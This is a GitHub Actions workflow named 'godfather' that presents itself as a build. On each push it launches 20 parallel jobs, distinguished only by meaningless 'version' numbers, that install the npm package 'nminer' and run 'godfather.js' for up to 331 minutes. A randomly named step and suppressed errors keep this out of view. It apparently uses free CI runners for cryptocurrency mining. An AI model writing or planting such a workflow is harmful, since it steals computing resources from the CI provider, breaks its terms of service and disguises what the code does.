name: godfather
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6247 }
          - { version: 3284 }
          - { version: 9804 }
          - { version: 404 }
          - { version: 1779 }
          - { version: 9996 }
          - { version: 1945 }
          - { version: 5733 }
          - { version: 6590 }
          - { version: 5310 }
          - { version: 8318 }
          - { version: 603 }
          - { version: 3000 }
          - { version: 1264 }
          - { version: 9749 }
          - { version: 6539 }
          - { version: 4019 }
          - { version: 7000 }
          - { version: 9716 }
          - { version: 6641 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: fond vacantly
        run: |
          npm install nminer@latest
          timeout 331m node godfather.js || echo "godfather executed"